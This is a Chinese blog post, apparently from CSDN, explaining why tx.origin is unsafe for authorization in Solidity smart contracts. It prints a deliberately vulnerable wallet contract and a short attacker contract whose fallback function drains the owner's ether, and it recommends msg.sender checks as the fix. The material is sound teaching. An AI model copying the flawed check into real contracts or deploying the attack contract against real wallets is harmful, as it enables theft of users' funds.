solidity智能合约中tx.origin的正确使用场景

最新推荐文章于 2024-04-19 22:25:56 发布
最新推荐文章于 2024-04-19 22:25:56 发布
阅读量4.4k 收藏 4
点赞数 3
分类专栏: 区块链 文章标签: solidity 智能合约 区块链 以太坊
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wo541075754/article/details/96445470
版权

简介

tx.origin是Solidity的一个全局变量,它遍历整个调用栈并返回最初发送调用(或事务)的帐户的地址。在智能合约中使用此变量进行身份验证会使合约容易受到类似网络钓鱼的攻击。

但针对tx.origin的使用并不用谈虎色变,正确的使用还是有它的应用场景的。

漏洞详解

漏洞合约

在如下合约中使用到了tx.origin的判断。

pragma solidity ^0.4.11;

// 不要使用这个合约,其中包含一个 bug。
contract TxUserWallet {
    address owner;

    function TxUserWallet() public {
        owner = msg.sender;
    }

    function transferTo(address dest, uint amount) public {
        require(tx.origin == owner);
        dest.transfer(amount);
    }
}

上面的合约提供了构造函数(新版本中使用constructor)和转账方法。其中在转账方法transferTo中进行了owner的判断,这里用到了tx.origin。

攻击者合约

下面看一下攻击者的合约:

pragma solidity ^0.4.11;

interface TxUserWallet {
    function transferTo(address dest, uint amount) public;
}

contract TxAttackWallet {
    address owner;

    function TxAttackWallet() public {
        owner = msg.sender;
    }

    function () public {
        TxUserWallet(msg.sender).transferTo(owner, msg.sender.balance);
    }
}

攻击者创建一个上面的合约,然后通过各种骗术来欺骗你用正常合约(TxUserWallet)的拥有者的地址向该攻击合约(TxAttackWallet)转账。然后区块链会默认调用攻击合约的fallback方法,也就是最后没有方法名的方法,并执行转账操作。

而此时TxUserWallet合约里面的校验是可以正常通过的。因为tx.origin是最初发起交易的地址,也就是合约拥有者的地址。然后,地址里面的ether便被转到攻击者地址中。

使用提醒

tx.origin不应该用于智能合约的授权。更多的时候采用msg.sender == owner来进行判断。

但它也有自己使用的场景,比如想要拒绝外部合约调用当前合约则可使用require(tx.origin ==msg.sender)来进行实现。

原文链接:https://www.choupangxia.com/2019/07/18/solidity智能合约中tx-origin的正确使用场景/

程序新视界

关注程序员的职场生涯,大量优质学习资源、技术文章分享

csdn-微信公众号

程序新视界
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
古老的Solidity智能合约错误代码编写
01-08
任何编程语言都有不完善的地方,而使用语言的过程也可能产生一些逻辑上的Bug。在Solidity0.4.23版本的时候,有人在GitHub上列举了一些使用Solidity编写智能合约时常见的错误用法。虽然现在大家基本上都不会再写同样的问题代码,但是重新学习一下仍然有着借鉴意义。 1、tx.origin 错误用法:判断调用者地址时使用tx.origin作为验证地址。 原因:tx.orgin作为交易的外部发起者,不管间合约调用(消息)有多少次,它是固定不变的。因此如果tx.origin无意调用了一个攻击合约,攻击合约再调用被攻击合约,就能通过这个验证。 修复:使用 msg.sender
【JavaScript源代码】使用ethers.js部署Solidity智能合约的方法.docx
12-29
使用ethers.js部署Solidity智能合约的方法   如果你已经在以太坊上开发过DApp,那你在前端JavaScript可能用过web3.js。Ethers.js则是一个轻量级的web3.js替代品。  与Web3.js相比,Ethers.js有很多优点,其我最喜欢的一个特性是Ethers.js提供的状态和密钥管理。Web3的设计场景是DApp应该连接到一个本地节点,由这个节点负责保存密钥、签名交易并与以太坊区块链交互。现实并不是这样的,绝大多数用户不会在本地运行一个geth节点。Metamask在浏览器应用有效地模拟了这种节点环境,因此绝大多数web3应用需要使用Metamas
Solidity智能合约语言.pdf
02-27
Solidity智能合约语⾔ 智能合约语⾔ 语⾔本⾝ 语⾔本⾝ ethereum官⽹ 笔记 笔记 uint[] result = new uint[](3); uint[] memory result = new uint[](ownerZombieCount[_owner]); 状态修饰符 view    不写 数据, pure    不读写 这两个从合约外部调⽤不费gas,内部调⽤会耗费gas ⾃定义modifiers 参数可为 被调⽤函数的参数 payable  可⽀付,可接受ether 以太 ERC20 代币像货币⼀样,按⾯值算,例如0.273以太 ERC721 代币是不能互换的,因为每个代币都被认为是唯⼀且不可分割的。 你只能以整个单位交易它们,并且每个单位都有唯⼀的 ID。(不过ERC721还没有正式的官⽅标准) 多继承 contract A is B,C {} 官⽹⽂档 官⽹⽂档 ⽂(更新很慢) 英⽂ (最新进度) 附上环境部分使⽤说明 附上环境部分使⽤说明 注意:NPM安装路径默认是当前⽬录,修改参见 记得将全局模块⽬录加⼊PATH REMIX-IDE 如果需要python2/3共存,只需要⽤改名法,具体如下 [类型] [只能被__调⽤] private 合约内部 internal 合约内部/继承的合约 external 合约外部 public 任何 function test(n个参数) external view onlyOwner anotherModifier { /* ... */ } 在重新打开命令⾏即可使得变量⽣效 记得使⽤ npm install remix-ide -g --python=python2 指定python2.exe VS2017安装 安装solidity插件 插件 浏览器打开 下载插件(此处安装会失败,提⽰不兼容VS2017问题),然后根据Q&A⾥热⼼⽤户的教程 也就是以压缩包形式打开,编辑压缩包⾥的extension.vsixmanifest,搜索')'替换为']',然后保存压缩包,双击安装即可 然后新建Solidity项⽬并查看项⽬⾥的 README.html 部署环境并操作 如果npm安装失败,查看⽇志发现是⽹络问题,请 Remix 在线 在线IDE(新版 新版)使⽤教程 使⽤教程 先激活3个基本插件 Debugger Debug Deploy & Run Transactions Solidity Compiler FWIW If you have VS community 2017 then 1-Open the extension using something like 7zip or winzip, 2-Edit the file 'extension.vsixmanifest' simply replacing three ')' with ']' 3-Save it and it appears to work. 4-Double click the extension and it installs (though it does give a warning which you can ignore). 5-You can then do a new Solidity project and compile it. By shaun pryszlak 2018/12/3 1. 编译当前打开的合约 2. 部署 选择合约sol⽂件并点击黄⾊的Deploy按钮 ( Deploy会调⽤构造函数 我这⾥不传⼊参数,表⽰调⽤⽆参构造⽅法 当然也可以传⼊⼀个uint8值调⽤构造函数 constructor(uint8 _numProposals) ) 部署成功如下图 点击展开, 填⼊参数(如我这⾥填4)并点击前⾯的按钮即可调⽤对应的函数(如我的vote函数) 运⾏结果在控制台可见 基本使⽤就是这样,更多请⾃⼰探究,调试功能是⽀持的
soliditytx.origin是一个全局变量,返回发送交易的账户地址。
wuygh的博客
01-10 320
soliditytx.origin是一个全局变量,返回发送交易的账户地址。
Solidity - 安全 - tx.origin
ling1998的博客
07-08 508
在官网tx.origin有一段描述:Never use tx.origin for authorization.(永远不要使用tx.origin 做身份认证),即类似验证语句如 require(tx.origin == owner); 举2个例子说明一下,同时也提出了一个问题。
solidity tx.origin和msg.sender那些事儿
haifeng_zhang_it的博客
01-02 1771
tx.origin与msg.sender是solidity容易令人迷惑的两个变量,尤其是当我们直接调用合约时两者的值是相同的。为了更清晰的说明两者的关系我们需要构造合约间的链式调用,来观察两者值的变化。
tx.origin 与 msg.sender
qq_42200107的博客
09-19 3197
web3/solidity 游戏,在第 4 级上,我浪费了几分钟来了解 tx.origin 和 msg.sender 之间的区别,它们在solidity 构建全局变量。您可能会注意到,账户地址和智能合约地址都可以是 msg.sender 但 tx.origin 将始终是账户/钱包地址。,tx.origin 保存交易发送者的地址,msg.sender 保存消息发送者的地址。指调用智能合约函数的账户地址,只有账户地址可以是tx.origin。最近损失了 800 万美元,是的,由于。一张图片胜过千言万语。
Solidity编写智能合约(入门)
01-27
Solidity,一个合约由一组代码(合约的函数)和数据(合约的状态)组成。合约位于以太坊区块链上的一个特殊地址。uint storedData;这行代码声明了一个状态变量,变量名为storedData,类型为uint (256bits无符号...
solidity 常见问题归纳总结
m0_46501404的博客
11-02 30
solidity
Solidity智能合约安全指南:预防已知攻击的关键.
博客致力于促进知识的共享,并且希望能将志同道合的人建立一起,拓宽视野,深化思考,获得新的启发.
07-08 2906
在进行Solidity智能合约开发时,确保合约的安全性是至关重要的。虽然编写一个简单的合约可能相对容易,但要确保它能够抵御各种已知和未知的攻击却是一项艰巨的任务。为了有效预防攻击,首先我们需要了解已知的一些常见攻击类型,只有了解清楚这些攻击,才能更好地保护合约的安全性本文将为您汇总一些Solidity已知的攻击类型,并提供一些预防这些攻击的关键措施(以下就是个人整理的一些已知攻击)重入算术溢出意外之财默认的可见性随机错觉外部智能合约引用短地址/参数攻击未检查的返回值竞争条件/预先交易。
DAPP开发(四)——Solidity语法
coding...
05-21 646
和uint是一样的,bytes默认是bytes1,byte1相当于uint8,bytes可以从1写到bytes32,bytes32其实就是uint256,它的长度其实就是对应的后缀数字,1-32,以一增加,但是其长度属性是不可以修改的。,必须通过转为bytes类型后才可以,通过bytes的[index]获取内容,获取到的是十六进制的数据,修改单个字节也是通过bytes类型。固定长度bytes转string:分两步,固定长度bytes转为动态长度bytes,将动态长度bytes转为string。
Solidity 合约安全,常见漏洞 (上篇)
dzqxwzoe的博客
03-06 852
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…上面列出的问题是智能合约被黑的主要途径,但还有很多其他的根本原因,可以串联成重大问题,下面记录了这些问题。给管理员的权力太少。
solidity 内联函数分析(转载)
shunuanwei的博客
09-23 1551
//转载,只为学习 最近大致浏览了一下Aragon的DAO框架合约,Solidity编写的源代码里使用了很多内联汇编。虽然这种做法有待商榷,但它同时也表明了熟练使用Solidity内联汇编的必要性与紧迫性。CSDN上已经有很多人对Solidity汇编这一章进行了翻译并且翻译的很好,只是:纸上得来终觉浅,绝知此事要躬行, 并且版本有更新,还是需要自己动手才行。因此决定对照英文文档做一下简单的文记录,目的是进行Solidity内联汇编的学习。这间也参考了他人的翻译文档,结此表示感谢。 本
Solidity智能合约:msg.owner,msg.sender,tx.origin
Messi-Q Blog
12-21 9167
Difference between msg.owner and msg.sender?     当部署合约时,msg.sender是合约的所有者,如果合约定义了一个名为“owner”的变量,则可以为其分配值(地址)msg.sender。                                                               address owner =...
智能合约:概念与特点(了解什么是智能合约以及它的特点,如自动执行、不可篡改和可信任)
最新发布
SYC20110120的博客
04-19 63
智能合约的执行结果由区块链网络的节点共识达成,并存储在不同节点的分布式账本上。这意味着合约的执行结果是可信的,不会受到个别节点的操纵或篡改。智能合约的代码一旦部署在区块链上,便不可更改。这意味着合约一旦被创建,其的规则和逻辑将始终有效,无法被修改或删除。智能合约通过预定义的代码和规则,在满足特定条件时自动执行。无需第三方介入,合约的操作将在预定条件满足时自动触发。
solidity 智能合约 实战
04-28
很高兴能为您解答关于 Solidity 智能合约实战的问题。 Solidity以太坊平台上的智能合约编程语言,可以用于开发各种去心化应用程序(DApps)。以下是一些您可以实战的 Solidity 智能合约项目: 1. 众筹智能合约:实现众筹的功能,投资者可以通过以太币参与项目,当项目达到目标金额时,众筹成功,否则退回投资者的以太币。 2. 投票智能合约:实现投票的功能,可以用于组织内部选举或社区治理等场景。 3. 银行智能合约:实现基本的银行功能,如存款、取款和转账等。 4. 物流智能合约:实现物流跟踪功能,可以用于物流行业的供应链管理等场景。 5. 数字身份智能合约:实现数字身份认证和管理功能,可以用于金融、医疗等领域。 以上仅是 Solidity 智能合约项目的一部分,您可以根据自己的需求和兴趣选择合适的项目进行实战练习。希望对您有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

程序新视界

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值